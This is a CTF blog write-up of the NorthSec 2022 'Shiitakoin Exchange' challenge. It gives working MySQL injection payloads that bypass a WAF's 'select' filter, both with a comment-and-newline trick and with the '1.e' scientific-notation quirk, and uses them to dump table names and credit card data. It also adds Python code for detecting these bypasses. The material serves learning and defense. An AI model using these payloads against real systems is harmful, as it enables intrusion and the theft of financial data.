NorthSec 2022 CTF Shiitakoin Exchange Solution

It's no secret I love the NorthSec CTF. I think it's hands down the best all-around CTF out there. For the second time in a row my team and I (PAUMD) placed first in the CTF. In doing so we solved a lot of really cool challenges. Overall I really enjoyed the challenges made by Marc Olivier Bergeron (mbergeron); he's a great challenge designer, and his template injection track (parts 2 and 3) left me seriously stumped.

The main takeaway from this challenge is that scientific notation with integer inputs can lead to a lot of weird stuff. Funny enough, I've personally seen this type of vulnerability in browser-based games (PHP) and in online casinos when sending money to others, but never in DBs.

In total 8 teams managed to solve this challenge during the CTF and unfortunately all solvers found a bypass one way or another.


The solution that PAUMD found was also an unintended one, a complete bypass of the intended way of solving the challenge. At its core the challenge was centred around a very unusual and hard-to-identify bug in MySQL regarding scientific notation, which allows SQL injections to be performed through certain WAFs.

There is a good, in-depth blog post written by the author of the challenge here.


Cool, so the CFO wants us to take a look at the web application containing "confidential financial information", and he's confident we won't find anything because of their WAF. The application looks like the following.


It's important to remember that most WAFs filter keywords like union, select, and so on. With a weak WAF this filter can be bypassed using inline comments, or with a more complex approach such as inserting other SQL keywords that separate the two words. In this challenge, however, it was discovered fairly early on that the WAF blocked select but not !select.

The only problem here is that !select is not valid Ess-cue-ell. However, if you "comment out" the ! with -- and end the comment with %0A (a newline), select will evaluate properly.

union -- !
SELECT

This works simply because SQL statements can be broken across multiple lines, which lets us run proper queries while bypassing both the WAF and the intended way of solving this challenge.

' and 2=1 union -- !
SELECT 1,@@version,3,4,5,6 #

Now that we've got the version, the next logical step is to query information_schema. This typically provides us with the database's table names, the data types of their columns, and so on.

' and 2=1 union -- !
SELECT 1,table_name,3,4,5,6 from `information_schema`-- a
.`tables` # 

There are a lot of interesting tables here, but what should really catch your eye is the payments_7d1a43de and transactions_c1a64cc6 tables. It's funny actually. For those of you who don't know, the CTF has a lore, and by looking at the transactions table we would actually figure out that the CFO is defrauding the company. However, for the purposes of getting flags we'll want to look at the payments table.

' and 2=1 union -- !
SELECT 1,id,credit_card_number,4,5,6 from payments_7d1a43de#

Ta-da, just like that we've got the flag.

askgod submit FLAG-46e5d6e00d31664f42f0d2290c473143
Congratulations, you score your team 3 points!

The intended solution is in fact the scientific notation bug. The intended payloads were:

' and id = 0 union 1.e(select table_name,1,column_name,1,1,1 from information_schema 1.e.columns)#

' and id = 0 union 1.e(select credit_card_number,1,1,1,1,1 from payments_7d1a43de)#
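To make the defensive lesson concrete, here is an added example (my own code, not from the original post or the challenge): a model of the weak keyword filter next to a check that first normalizes the value the way MySQL will read it, decoding %0A, dropping comments and the 1.e prefix, and only then matching keywords. The weak filter's exact rule and the 1.e stripping step are assumptions; the sample values are constructed from the payloads shown above.

```python
import re
from urllib.parse import unquote_plus

# Constructed samples (not captured traffic): the two bypass payloads from the
# write-up, one of them URL-encoded as a browser would send it, plus a benign value.
SAMPLES = {
    "newline": "' and 2=1 union -- !\nSELECT 1,@@version,3,4,5,6 #",
    "newline_encoded": "'+and+2%3D1+union+--+!%0ASELECT+1,@@version,3,4,5,6+%23",
    "sci_notation": "' and id = 0 union 1.e(select table_name,1,column_name,1,1,1 "
                    "from information_schema 1.e.columns)#",
    "benign": "order #42 -- rush delivery",
}

def naive_blocked(param: str) -> bool:
    """Assumed model of the weak WAF: decode, then flag 'select' only when it
    starts the value or follows a space/tab. That is why '!select', a newline
    before SELECT, and '(select' all slip past it."""
    decoded = unquote_plus(param)
    return re.search(r"(?:^|[ \t])select", decoded, re.IGNORECASE) is not None

def normalize(param: str) -> str:
    """Rewrite the value the way MySQL will parse it before any matching."""
    s = unquote_plus(param)                              # %0A -> newline, + -> space
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)         # /* ... */ block comments
    s = re.sub(r"(?:--[ \t]|#)[^\n]*", " ", s)           # '-- ' and '#' run to end of line
    s = re.sub(r"\b\d+\.e(?=[(.])", " ", s, flags=re.I)  # assumed: drop the '1.e(' / '1.e.' quirk
    return re.sub(r"\s+", " ", s).strip().lower()        # newlines become plain spaces

def hardened_blocked(param: str) -> bool:
    """Keyword check on the normalized form, using real word boundaries."""
    s = normalize(param)
    return any(re.search(rf"\b{k}\b", s) for k in ("union", "select"))

if __name__ == "__main__":
    for name, value in SAMPLES.items():
        print(f"{name:16} naive={naive_blocked(value)!s:5} hardened={hardened_blocked(value)}")
```

Normalizing before matching closes the two gaps this write-up exploits, but a keyword blocklist stays a blunt instrument; the query itself should be parameterized so the WAF is never the only control.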

This might be the only challenge I'll write up, unfortunately. I wasn't able to solve all three parts of the template injection challenge that I really liked, and I did an overall poor job documenting the other challenges. Anyways, thank you for reading! Hope to see you all on-site at NorthSec 2023 =:)
